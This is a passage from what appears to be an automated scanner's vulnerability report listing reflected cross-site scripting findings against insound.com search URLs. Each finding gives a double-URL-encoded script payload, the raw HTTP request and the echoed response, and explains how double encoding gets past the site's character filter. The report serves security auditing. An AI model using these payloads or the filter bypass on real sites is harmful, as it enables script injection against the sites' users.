X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0tkup712c1uaa5mjs5p932kr34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=241165276; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=470666164; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Mark McGuire898ca</title><script>alert(1)</script>187d020e590</title>
...[SNIP]...

1.183. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matt%20Shadetek&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec86%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60db9deca47 was submitted in the REST URL parameter 3. This input was echoed as aec86"><script>alert(1)</script>60db9deca47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matt%20Shadetekaec86%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60db9deca47&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=djo33jq5k05hm7pnl6a66krep7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=81199055; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=184874954; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Matt Shadetekaec86"><script>alert(1)</script>60db9deca47" />
...[SNIP]...

1.184. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matt%20Shadetek&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c7a94%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e23fd8638a9f was submitted in the REST URL parameter 3. This input was echoed as c7a94</title><script>alert(1)</script>23fd8638a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matt%20Shadetekc7a94%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e23fd8638a9f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c1arlsctp978mik574c7jhk021; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=478513417; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=44973102; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Matt Shadetekc7a94</title><script>alert(1)</script>23fd8638a9f</title>
...[SNIP]...

1.185. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matthew%20Dear&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f1c90%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64fd3d3b3bd was submitted in the REST URL parameter 3. This input was echoed as f1c90</title><script>alert(1)</script>64fd3d3b3bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matthew%20Dearf1c90%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64fd3d3b3bd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=jvvca1ce13d8aj392sba5vral6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48964392; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=307515476; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Matthew Dearf1c90</title><script>alert(1)</script>64fd3d3b3bd</title>
...[SNIP]...

1.186. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matthew%20Dear&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3baae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3d5b90c1f6 was submitted in the REST URL parameter 3. This input was echoed as 3baae"><script>alert(1)</script>d3d5b90c1f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matthew%20Dear3baae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3d5b90c1f6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0sqr4b9rn44vnl1chi0sif6hq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462756101; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=559530323; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Matthew Dear3baae"><script>alert(1)</script>d3d5b90c1f6" />
...[SNIP]...

1.187. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Miko&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e82a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd299282faf was submitted in the REST URL parameter 3. This input was echoed as 7e82a"><script>alert(1)</script>dd299282faf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Miko7e82a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd299282faf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bt3ttfv2coiml2c0n4u9h46be5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=187793335; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=384185930; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Miko7e82a"><script>alert(1)</script>dd299282faf" />
...[SNIP]...

1.188. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Miko&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload db927%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b8896b0659 was submitted in the REST URL parameter 3. This input was echoed as db927</title><script>alert(1)</script>3b8896b0659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mikodb927%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b8896b0659&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=a1d5qpig8ntuok0t6vubla5ql6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=35780573; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=33707272; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Mikodb927</title><script>alert(1)</script>3b8896b0659</title>
...[SNIP]...

1.189. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Query&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b355c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c16d003cfc was submitted in the REST URL parameter 3. This input was echoed as b355c</title><script>alert(1)</script>1c16d003cfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Queryb355c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c16d003cfc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1ldc0n0hpf7ecp6b3an3i9sje3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=72025940; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=495952899; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nate Queryb355c</title><script>alert(1)</script>1c16d003cfc</title>
...[SNIP]...

1.190. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Query&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb97fde7aa was submitted in the REST URL parameter 3. This input was echoed as 7fd84"><script>alert(1)</script>8cb97fde7aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Query7fd84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb97fde7aa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c8hjo7pd71u007avgvkqih72e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=567353594; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=74335064; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nate Query7fd84"><script>alert(1)</script>8cb97fde7aa" />
...[SNIP]...

1.191. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Ruth&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d4cb5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0285cbf68e5 was submitted in the REST URL parameter 3. This input was echoed as d4cb5</title><script>alert(1)</script>0285cbf68e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Ruthd4cb5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0285cbf68e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=61amr3i8cte8ah99ds4k8qoga5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=537959085; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=373090258; expires=Sun, 09-Jan-2011 02:38:27 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nate Ruthd4cb5</title><script>alert(1)</script>0285cbf68e5</title>
...[SNIP]...

1.192. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Ruth&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40d85bd307f was submitted in the REST URL parameter 3. This input was echoed as ade03"><script>alert(1)</script>40d85bd307f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Ruthade03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40d85bd307f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pc250tviiaal3pnntf4k634un7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=404675123; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=350972573; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nate Ruthade03"><script>alert(1)</script>40d85bd307f" />
...[SNIP]...

1.193. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathalie%20Nordnes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39718%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42e837510e8 was submitted in the REST URL parameter 3. This input was echoed as 39718"><script>alert(1)</script>42e837510e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathalie%20Nordnes39718%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42e837510e8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cdlp3c3fe3adsari6t128fqe07; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=273769947; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490413057; expires=Sun, 09-Jan-2011 02:38:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathalie Nordnes39718"><script>alert(1)</script>42e837510e8" />
...[SNIP]...

1.194. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathalie%20Nordnes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a331b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0de9c568909 was submitted in the REST URL parameter 3. This input was echoed as a331b</title><script>alert(1)</script>0de9c568909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathalie%20Nordnesa331b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0de9c568909&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
